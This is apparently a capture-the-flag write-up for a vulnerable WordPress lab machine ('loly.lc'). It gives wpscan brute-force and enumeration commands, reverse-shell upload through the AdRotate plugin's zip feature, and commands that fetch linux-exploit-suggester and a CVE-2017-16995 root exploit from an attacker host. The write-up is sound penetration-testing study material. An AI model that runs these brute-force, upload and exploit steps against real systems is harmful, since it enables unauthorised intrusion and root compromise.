NETWORK

ENUMERATION

Visiting Wordpress

running a brute force directory we have found /wordpress

visiting this folder we get a broken Wordpress instance

looking into the headers, we can see loly.lc

adding this domain to our /etc/hosts

we then have access to a working Wordpress website

FOOTHOLD

User brute force

A Wpscan has revealed a user “loly”

fortunately running a brute force against the user loly, has revealed the password associated to this user

wpscan --url http://loly.lc/wordpress --disable-tls-checks --no-banner --no-update -U loly -P /usr/share/wordlists/rockyou.txt

Abusing Adrotate plugin

Using the following wpscan

wpscan --url http://loly.lc/wordpress --enumerate vp,vt,u,cb,dbe,u1-10 --detection-mode aggressive --no-banner --no-update

we have found the following

and especially a vulnerability in the plugin Adrotate

Unfortunately, none of the vulnerabilities revealed by the scan where exploitable due to the version of the plugin (version 5.8.6.2).

Luckily, we noticed that we were allowed to upload Zip file via the plugin. For any Zip file uploaded the plugin would unzip the file on the server (in the upload folder).

After Zipping a reverse shell http://pentestmonkey.net/tools/php-reverse-shell

zip -r php-reverse-shell.zip php-reverse-shell.php

and uploading the Zip file to the server

we were able to retrieve the file on the server

and catch a reverse shell on our local machine

Shell as Loly

While on the server, looking into the Wordpress configuration, we have found Loly user credentials

PRIV ESCALATION

Dirtycow vulnerability

A linpeas scan revealed a dirtycow vulnerability has “highly probable” on the machine

But unfortunately this route wasn’t successful for us

Abusing eBPF_verifier

Using linux-exploit-suggester

wget http://192.168.49.204/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh

bash linux-exploit-suggester.sh | tee -a linux-exploit-suggester

We have discover CVE-2017-16995, a possibility to bypass the bpf verifier (verifier.c), load bpf code, and create a read/write primitive.

After uploading the exploit on the victim machine

wget http://192.168.49.204/45010.c

We gain a root shell by running the exploit

PATH=/usr/include/linux:$PATH gcc 45010.c -o exploit